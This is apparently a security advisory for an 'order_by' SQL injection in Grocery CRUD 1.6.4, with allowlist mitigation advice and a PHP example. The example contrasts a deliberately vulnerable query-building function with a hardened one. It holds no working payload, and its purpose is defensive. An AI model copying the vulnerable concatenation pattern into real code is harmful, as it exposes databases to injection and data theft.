Vendor: Grocery Crud
By: TonyShavez
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Grocery Crud
Affected Version From: < v2.0.1
Affected Version To: < v2.0.1
Patch Exists: NO
Related CWE: N/A
CPE: a:grocerycrud:grocery_crud:1.6.4
Metasploit:
N/A
Other Scripts:
N/A
Platforms Tested: Linux Ubuntu
Grocery CRUD 1.6.4 - 'order_by' SQL Injection
Grocery CRUD version 1.6.4 is vulnerable to SQL injection through the 'order_by' parameter. An attacker who controls the 'order_by' parameter of the POST request to the ajax_list page can inject SQL into the query, which can be used to extract data from the database.
Mitigation:
Input validation should be used to prevent SQL injection. All user-supplied input should be validated and filtered before it is used in an SQL query; a sort column name in particular should be checked against a list of known column names rather than placed into the query as received.
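The allowlist check described above, as an added example that is not Grocery CRUD's own code: it assumes the request carries the column in order_by[0] and the direction in order_by[1], and contrasts plain concatenation with a version that only lets known identifiers reach the query text (identifiers in ORDER BY cannot be bound as prepared-statement parameters, so an allowlist is the sound defence).

```php
<?php
// Added example (not Grocery CRUD's code). Assumed request shape:
// order_by[0] = column name, order_by[1] = sort direction.

/** Vulnerable pattern: request values are concatenated straight into SQL. */
function build_order_by_vulnerable(array $post): string
{
    $column    = $post['order_by'][0] ?? 'id';
    $direction = $post['order_by'][1] ?? 'asc';
    return "SELECT * FROM customers ORDER BY $column $direction";
}

/** Hardened pattern: only allowlisted identifiers reach the query text. */
function build_order_by_safe(array $post, array $allowedColumns): string
{
    $column    = $post['order_by'][0] ?? 'id';
    $direction = $post['order_by'][1] ?? 'asc';

    // Anything that is not a string naming a known column is replaced by a
    // safe default; the request value itself never appears in the SQL.
    if (!is_string($column) || !in_array($column, $allowedColumns, true)) {
        $column = 'id';
    }
    // Direction is restricted to the two literal keywords.
    if (!is_string($direction) || !in_array(strtolower($direction), ['asc', 'desc'], true)) {
        $direction = 'asc';
    }
    $direction = strtolower($direction);

    // The identifier is now one of our own literals; quote it anyway.
    return "SELECT * FROM customers ORDER BY `$column` $direction";
}

// Constructed request: a value that is not a real column name.
$post    = ['order_by' => ['not_a_column', 'DESC']];
$allowed = ['id', 'name', 'created_at'];

echo build_order_by_vulnerable($post), PHP_EOL; // request value lands in the SQL text
echo build_order_by_safe($post, $allowed), PHP_EOL; // falls back to `id` desc
```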